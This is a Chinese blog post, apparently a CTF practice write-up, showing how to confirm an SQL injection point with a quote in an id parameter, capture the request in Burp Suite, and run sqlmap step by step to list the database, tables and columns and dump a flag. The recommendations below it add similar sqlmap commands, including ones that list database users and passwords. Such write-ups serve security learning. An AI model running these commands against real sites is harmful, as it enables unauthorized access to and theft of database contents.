使用sqlmap + burpsuite sql工具注入拿flag

已于 2023-02-13 17:38:47 修改
阅读量1.6k 收藏 11
点赞数 2
分类专栏: web 文章标签: python 数据库 开发语言
于 2023-02-13 17:02:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afanzcf/article/details/129012753
版权

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

Afanbird
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用sqlmap注入获取flag
weixin_43910033的博客
01-21 4488
准备注入网址:http://192.168.129.129:8079 (需要自己搭建) 注入点:id 1.注入语句: python sqlmap.py -u "http://192.168.129.129:8079/?id=1" 2.得到数据库是MySQL,进一步获取数据库信息。 python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs 3.得到可用的数据库,查询数据库里面的表以获取表信息 python sqlmap.py -u "
SQL注入实战第一个flag
qq_41904330的博客
08-04 6105
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
sql手工注入练习拿flag
太阳照耀我走四方
02-14 2339
sql手工简单注入拿flag
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1180
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4464
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
Sqlmap
qq_45405155的博客
12-31 680
Sqlmap 1、Sqlmap对get请求数字型、字符型注入## 标题 2、sqlmap对Get请求注入 对http://www.whalwl.host:8001/bug/sql_injection/sql_num.php进行get注入 命令python sqlmap.py -u ”http://www.whalwl.host:8001/bug/sql_injection/sql_num.php?id=1&submit=submit” --dbs 查询dwvs库表名 命令: python sqlm
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
burpsuite插件sqlmap4burp安装包
01-05
已编译,亲测可直接使用,直接用burpsuite抓包,右键选择send to sqlmap4burp ,直接调用sqlmap进行注入点测试
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
SqlMap_BurpSuite:SqlMap_BurpSuite
03-10
SqlMap_BurpSuite编译好的sqlmap.jargrep -r“发送到Sqlmap” src/burp/SnifferContextMenuFactory.java: JMenuItem jMenuItem = new JMenuItem("send to ... 使用Burp,Sqlmap进行自动化批量SQL注入渗透测试参考链接
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
SQL注入注入点找法
weixin_51519028的博客
07-18 8280
1,注入点首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。 2,交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.php?id=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http://www.xxx.com:50006/index.php?x=home&c=View&a=index&aid=9 这样的地址其实也可能存在注入。......
没有注入点,如何拿站
legends2012的专栏
12-25 4167
<br />邪八的一篇文章<br />1爆库 <br />原理: <br />"%5c"暴库法,它不是网页本身的漏洞,而是利用了iis解码方式中的一个特性,如果iis安全设置不周全,而网页设计者未考虑IIS错误,就会被人利用。 为何要用"%5c"?它实际上是"/"的十六进制代码,也就是"/"的另一种表示法。当我们把"/"换成十六进制写法"%5c"时,ie不会对此进行转换。地址中的"%5c"被原样提交了.当iis收到后解析时,又会将%5c还原成"/",所有调用数据库的连接文件中都有Server.MapPath
python注入点查找_sqlmap常用注入点检测&爆破命令
weixin_28933179的博客
01-14 219
1、检测注入点是否可用python sqlmap.py -u "url"2、从目标url爆破所有数据库python sqlmap.py -u "url" --dbs3、从目标url爆破当前数据库python sqlmap.py -u "url" --current-dbs4、列出数据库所有用户python sqlmap.py -u "url" --users5、列出数据库账户密码python ...
SQL注入sqlmap入门教程_sqlmap注入
ewii12567的博客
04-10 461
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具使用分享。
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9055
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
sqlmap工具基本使用(检测sql注入
m0_37570494的博客
01-25 6152
sqlmap的用户手册: sqlmappython2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
SQL注入点】注入点出现位置、判断、编码、利用
07-01 5456
SQL-注入点】
如何使用Nmap、SqlmapBurpsuite工具进行安全测试;
05-25
Nmap、SqlmapBurpsuite是非常流行的安全测试工具,可以帮助安全测试人员检测网络和应用程序中的漏洞和安全问题。以下是这些工具的简要说明和使用方法: 1. Nmap:Nmap是一款网络探测和安全测试工具,可以用于扫描网络上的主机和端口,识别主机操作系统和服务,检测漏洞等。常用命令包括: - 扫描目标主机:nmap [target IP] - 扫描指定端口:nmap -p [port number] [target IP] - 扫描指定端口范围:nmap -p [start port]-[end port] [target IP] - 探测主机操作系统:nmap -O [target IP] - 探测服务版本:nmap -sV [target IP] 2. SqlmapSqlmap是一款自动化SQL注入工具,可以用于检测Web应用程序中的SQL注入漏洞。常用命令包括: - 检测SQL注入漏洞:sqlmap -u [target URL] - 指定数据库类型:sqlmap -u [target URL] --dbms=[database type] - 指定注入点参数:sqlmap -u [target URL] -p [parameter name] - 获取数据库信息:sqlmap -u [target URL] -D [database name] --tables - 获取表信息:sqlmap -u [target URL] -D [database name] -T [table name] --columns 3. BurpsuiteBurpsuite是一款用于拦截、修改和重发HTTP请求的代理工具,可以用于Web应用程序的安全测试。常用功能包括: - 拦截HTTP请求和响应:在Proxy -> Intercept页面启用拦截功能,可以手动拦截HTTP请求和响应,并对其进行修改和重发。 - 扫描Web应用程序:在Scanner -> Active Scan页面,可以对Web应用程序进行漏洞扫描,包括SQL注入、XSS等。 - 模拟攻击:在Intruder页面,可以模拟各种攻击,如密码猜测、文件包含、命令执行等。 - 破解会话:在Session Handling -> Session Management页面,可以对Web应用程序的会话进行管理和破解。 以上是这些工具的简要说明和使用方法,使用这些工具进行安全测试需要具备一定的技术水平和安全意识,建议在合法授权和合规的情况下进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值